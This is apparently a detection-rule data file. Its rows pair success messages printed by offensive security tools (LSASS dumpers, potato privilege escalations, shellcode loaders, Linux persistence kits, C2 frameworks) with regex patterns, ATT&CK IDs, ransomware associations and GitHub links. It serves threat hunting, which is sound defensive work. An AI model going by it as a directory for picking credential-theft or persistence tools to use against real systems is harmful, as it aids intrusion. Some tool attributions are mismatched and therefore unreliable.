"*[+] Sending S4U2proxy request via KDC proxy:*",".{0,1000}\[\+\]\sSending\sS4U2proxy\srequest\svia\sKDC\sproxy\:.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13306"
"*[+] Sending S4U2self request to *",".{0,1000}\[\+\]\sSending\sS4U2self\srequest\sto\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13307"
"*[+] Sending S4U2self request via KDC proxy:*",".{0,1000}\[\+\]\sSending\sS4U2self\srequest\svia\sKDC\sproxy\:.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13308"
"*[+] Server connected to our evil RPC pipe*",".{0,1000}\[\+\]\sServer\sconnected\sto\sour\sevil\sRPC\spipe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13309"
"*[+] Server connected to our evil RPC pipe*",".{0,1000}\[\+\]\sServer\sconnected\sto\sour\sevil\sRPC\spipe.{0,1000}","offensive_tool_keyword","SharpEfsPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpEfsPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","13310"
"*[+] Server connected to our evil RPC pipe*",".{0,1000}\[\+\]\sServer\sconnected\sto\sour\sevil\sRPC\spipe.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","#content","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","13311"
"*[+] SeTcbPrivilege is enabled successfully*",".{0,1000}\[\+\]\sSeTcbPrivilege\sis\senabled\ssuccessfully.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#content","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","13312"
"*[+] ShadowSpray recovered *",".{0,1000}\[\+\]\sShadowSpray\srecovered\s.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#content","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","13313"
"*[+] SharpHide running as elevated user*",".{0,1000}\[\+\]\sSharpHide\srunning\sas\selevated\suser.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","#content","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","13314"
"*[+] SharpHide running as normal user*",".{0,1000}\[\+\]\sSharpHide\srunning\sas\snormal\suser.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","#content","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","13315"
"*[+] Shellcode Injected Successfully*",".{0,1000}\[\+\]\sShellcode\sInjected\sSuccessfully.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","#content","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","13316"
"*[+] Shellcode injected, waiting 60s for the hook to be called*",".{0,1000}\[\+\]\sShellcode\sinjected,\swaiting\s60s\sfor\sthe\shook\sto\sbe\scalled.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#content","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","13317"
"*[+] Shoggoth engine is initiated!*",".{0,1000}\[\+\]\sShoggoth\sengine\sis\sinitiated!.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","#content","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","13318"
"*[+] SID added to msDS-AllowedToActOnBehalfOfOtherIdentity*",".{0,1000}\[\+\]\sSID\sadded\sto\smsDS\-AllowedToActOnBehalfOfOtherIdentity.{0,1000}","offensive_tool_keyword","Cable","*.NET post-exploitation toolkit for Active Directory reconnaissance and exploitation*","T1087 - T1016 - T1059 - T1482 - T1078","TA0007 - TA0002 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/logangoins/Cable","1","0","#content","N/A","7","4","361","40","2025-04-09T01:12:47Z","2024-08-10T19:47:08Z","13319"
"*[+] SID added to msDS-AllowedToActOnBehalfOfOtherIdentity*",".{0,1000}\[\+\]\sSID\sadded\sto\smsDS\-AllowedToActOnBehalfOfOtherIdentity.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#content","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","13320"
"*[+] SMB reflected DCOM authentication succeeded!*",".{0,1000}\[\+\]\sSMB\sreflected\sDCOM\sauthentication\ssucceeded!.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","#content","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","13321"
"*[+] SMB reflected DCOM authentication succeeded!*",".{0,1000}\[\+\]\sSMB\sreflected\sDCOM\sauthentication\ssucceeded!.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","#content","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","13322"
"*[+] SMBRemoting and WMIRemoting Loaded*",".{0,1000}\[\+\]\sSMBRemoting\sand\sWMIRemoting\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13323"
"*[+] Spawning root shell*",".{0,1000}\[\+\]\sSpawning\sroot\sshell.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","#content","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","13324"
"*[+] Spawning SYSTEM shell*",".{0,1000}\[\+\]\sSpawning\sSYSTEM\sshell.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","#content","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","13325"
"*[+] SSH key persistence established!*",".{0,1000}\[\+\]\sSSH\skey\spersistence\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13326"
"*[+] Starting Macro_Pack web server*",".{0,1000}\[\+\]\sStarting\sMacro_Pack\sweb\sserver.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#content","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","13327"
"*[+] Starting Nameless Server*",".{0,1000}\[\+\]\sStarting\sNameless\sServer.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#content","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","13328"
"*[+] Starting pspy now*",".{0,1000}\[\+\]\sStarting\spspy\snow.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#content #linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","13329"
"*[+] Starting share enumeration against * hosts*",".{0,1000}Starting\sshare\senumeration\sagainst\s.{0,1000}\shosts.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","#content","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","13330"
"*[+] Stole token from*",".{0,1000}\[\+\]\sStole\stoken\sfrom.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","#content","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","13331"
"*[+] Succesfuly wrote shellcode to victim. about to start the Mirroring*",".{0,1000}\[\+\]\sSuccesfuly\swrote\sshellcode\sto\svictim\.\sabout\sto\sstart\sthe\sMirroring.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","#content","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","13332"
"*[+] Success! Entering webshell*",".{0,1000}\[\+\]\sSuccess!\sEntering\swebshell.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hausec/ProxyLogon","1","0","#content","N/A","10","3","293","76","2024-07-02T10:00:00Z","2021-03-15T14:37:57Z","13333"
"*[+] Success! LD_PRELOAD has been added!*",".{0,1000}\[\+\]\sSuccess!\sLD_PRELOAD\shas\sbeen\sadded!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#content #linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","13334"
"*[+] Successful allocated remote memory: lpRemoteLibraryBuffer:[*",".{0,1000}\[\+\]\sSuccessful\sallocated\sremote\smemory\:\slpRemoteLibraryBuffer\:\[.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","#content","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","13335"
"*[+] Successful change protection: RW -> RX*",".{0,1000}\[\+\]\sSuccessful\schange\sprotection\:\sRW\s\-\>\sRX.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","#content","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","13336"
"*[+] Successful copied dll buffer*",".{0,1000}\[\+\]\sSuccessful\scopied\sdll\sbuffer.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","#content","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","13337"
"*[+] Successful injected DLL: hThread:*",".{0,1000}\[\+\]\sSuccessful\sinjected\sDLL\:\shThread\:.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","#content","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","13338"
"*[+] successfully breached the mainframe as real-PID *",".{0,1000}\[\+\]\ssuccessfully\sbreached\sthe\smainframe\sas\sreal\-PID\s.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","13339"
"*[+] Successfully decrypted minidump file*",".{0,1000}\[\+\]\sSuccessfully\sdecrypted\sminidump\sfile.{0,1000}","offensive_tool_keyword","Dumpy","Reuse open handles to dynamically dump LSASS","T1003.001 - T1055.001 - T1083","TA0006","N/A","N/A","Credential Access","https://github.com/Kudaes/Dumpy","1","0","#content","N/A","10","3","243","24","2024-04-04T07:42:26Z","2021-10-13T21:54:59Z","13340"
"*[+] Successfully decrypted NGC key set from protector type *",".{0,1000}\[\+\]\sSuccessfully\sdecrypted\sNGC\skey\sset\sfrom\sprotector\stype\s.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","#content","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","13341"
"*[+] Successfully downloaded GPO from fakedc to *",".{0,1000}\[\+\]\sSuccessfully\sdownloaded\sGPO\sfrom\sfakedc\sto\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","#content","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","13342"
"*[+] Successfully downloaded legitimate GPO from SYSVOL to *",".{0,1000}\[\+\]\sSuccessfully\sdownloaded\slegitimate\sGPO\sfrom\sSYSVOL\sto\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","#content","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","13343"
"*[+] Successfully injected into process *",".{0,1000}\[\+\]\sSuccessfully\sinjected\sinto\sprocess\s.{0,1000}","offensive_tool_keyword","Invoke-RDPThief","perform process injection on the target process and inject RDPthief into the process in order to capture cleartext credentials","T1055 - T1056 - T1071 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/The-Viper-One/Invoke-RDPThief","1","0","#content","N/A","10","1","62","8","2025-01-21T20:12:33Z","2024-10-01T20:12:00Z","13344"
"*[+] Successfully injected malicious scheduled task*",".{0,1000}\[\+\]\sSuccessfully\sinjected\smalicious\sscheduled\stask.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","#content","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","13345"
"*[+] Successfully injected malicious scheduled task*",".{0,1000}\[\+\]\sSuccessfully\sinjected\smalicious\sscheduled\stask.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","#content","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","13346"
"*[+] Successfully opened {LSASS} handle*",".{0,1000}\[\+\]\sSuccessfully\sopened\s\{LSASS\}\shandle.{0,1000}","offensive_tool_keyword","blindsight","Red teaming tool to dump LSASS memory, bypassing basic countermeasures","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/0xdea/blindsight","1","0","#content","N/A","10","3","225","26","2024-12-31T15:28:15Z","2024-07-18T07:35:43Z","13347"
"*[+] Successfully opened LSASS, PID: *",".{0,1000}\[\+\]\sSuccessfully\sopened\sLSASS,\sPID\:\s.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","#content","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","13348"
"*[+] Successfully retrieved an access token for User:*",".{0,1000}\[\+\]\sSuccessfully\sretrieved\san\saccess\stoken\sfor\sUser\:.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","#content","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","13349"
"*[+] successfully self destructed server*",".{0,1000}\[\+\]\ssuccessfully\sself\sdestructed\sserver.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","#content","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","13350"
"*[+] Successfully set the spool directory to: *",".{0,1000}\[\+\]\sSuccessfully\sset\sthe\sspool\sdirectory\sto\:\s.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","#content","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","13351"
"*[+] Successfully spoofed GPC gPCFileSysPath attribute*",".{0,1000}\[\+\]\sSuccessfully\sspoofed\sGPC\sgPCFileSysPath\sattribute.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","#content","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","13352"
"*[+] Successfully spoofed gPLink for OU *",".{0,1000}\[\+\]\sSuccessfully\sspoofed\sgPLink\sfor\sOU\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","#content","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","13353"
"*[+] Successfully updated extension names of fakedc GPO*",".{0,1000}\[\+\]\sSuccessfully\supdated\sextension\snames\sof\sfakedc\sGPO.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","#content","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","13354"
"*[+] Successfully uploaded GPO to SMB server *",".{0,1000}\[\+\]\sSuccessfully\suploaded\sGPO\sto\sSMB\sserver\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","#content","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","13355"
"*[+] Sucessfully Dumped Process!*",".{0,1000}\[\+\]\sSucessfully\sDumped\sProcess!.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","#content","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","13356"
"*[+] Sucessfully injected the shellcode into *",".{0,1000}\[\+\]\sSucessfully\sinjected\sthe\sshellcode\sinto\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13357"
"*[+] Suitable Handle to LSASS Found from PID: *",".{0,1000}\[\+\]\sSuitable\sHandle\sto\sLSASS\sFound\sfrom\sPID\:\s.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","#content","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","13358"
"*[+] SYSKEY restrieving*",".{0,1000}\[\+\]\sSYSKEY\srestrieving.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","#content","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","13359"
"*[+] SYSKEY restrieving*",".{0,1000}\[\+\]\sSYSKEY\srestrieving.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","#content","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","13360"
"*[+] Systemd Generator persistence established!*",".{0,1000}\[\+\]\sSystemd\sGenerator\spersistence\sestablished!.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13361"
"*[+] SysWhispers is not compatible with Obfuscator-LLVM; switching to GetSyscallStub*",".{0,1000}\[\+\]\sSysWhispers\sis\snot\scompatible\swith\sObfuscator\-LLVM\;\sswitching\sto\sGetSyscallStub.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13362"
"*[+] SysWhispers is not compatible with Obfuscator-LLVM; switching to GetSyscallStub*",".{0,1000}\[\+\]\sSysWhispers\sis\snot\scompatible\swith\sObfuscator\-LLVM\;\sswitching\sto\sGetSyscallStub.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13363"
"*[+] task has been created successfully  ..!*",".{0,1000}\[\+\]\stask\shas\sbeen\screated\ssuccessfully\s\s\.\.!.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","#content","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","13364"
